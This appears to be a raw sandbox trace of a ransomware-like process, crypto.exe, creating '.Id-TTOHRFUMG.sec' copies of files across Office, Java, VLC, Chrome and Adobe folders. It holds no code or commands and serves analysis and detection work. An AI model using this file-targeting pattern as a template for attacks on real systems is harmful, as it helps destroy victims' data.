File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02268_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\liblive555_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pl.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD00687_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FORM.JS.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.dll	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BCSEvents.man.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Country.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_hu.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\tools.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107328.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0175361.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\PAWPRINT.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Star_Empty.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\STSUPLD.INTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.Tools.Applications.Project.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\pl.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105246.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libtdummy_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-io-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_justify.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsBlankPage.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\7-Zip\Lang\mn.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\UmOutlookStrings.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\AccessibleHandler.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jfxmedia.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01046J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME49.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCDCNCLS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\LightSpirit.css.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099147.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00234_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0386267.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03466_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18227_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\IPOLK.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\klist.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\PublicAssemblies\Microsoft.VisualStudio.Tools.Applications.Adapter.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Adjacency.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\BUTTON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_chroma\librv32_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationRight_ButtonGraphic.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libspudec_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02040U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187847.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\xul.dll.sig.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\.eclipseproduct.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SY00132_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115836.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD15184_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Simple.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SNET.NET.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Port-au-Prince.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0187859.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Executive.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\STS2\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsMacroTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.DPV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\wmpnetwk.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099148.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\btn-next-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21343_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\BORDERS\MSART9.BDR.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\highlight.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0232797.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382938.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14984_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Europe\Tirane.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00656_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00037_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_VelvetRose.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\mscss7wre_es.dub.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\settings.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01682_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\POSTCD11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\Pitchbook.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\chrmstp.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\artifacts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01701_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_sent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\README.txt.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\AddToViewArrow.jpg.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\DefaultBlackAndWhite.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MSOSYNC.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\11.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\sawindbg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\CONVERT\1033\OLADDR.FAE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN022.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Manila.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_decreaseindent.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Irkutsk.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\[email protected]	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color32.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Bibliography\Style\CHICAGO.XSL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_hov.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0198372.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750G.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18232_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR28F.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\AccessWeb\CLNTWRAP.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107468.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD21427_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\OnLineBusy.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libqsv_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\19.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\BD14882_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293240.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\Presentation Designs\Maple.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\browser\blocklist.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\zip.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rainy_River.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-heapwalker.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SECURE.CFG.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_SelectionSubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\Main.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Stationery\1033\JUDGESCH.HTM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Ojinaga.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_plain_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSTORE.HXS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libhttps_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_ring_docked.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsScenesBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\ModifiedTelespace.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105912.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ONENOTEMANAGED.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow\TAB_ON.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Urumqi.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\MSOUC_COL.HXC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGMARQ.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\BillingStatement.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00911_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\DataServices\+NewSQLServerConnection.odc.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL065.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Photo Viewer\PhotoAcq.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Curacao.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\720x480blacksquare.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\dtplugin\npdeployJava1.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-uihandler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-crescent_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21327_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\XML Files\Messenger.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_concat_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00809_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\rings-desk.png.Id-TTOHRFUMG.sec	crypto.exe
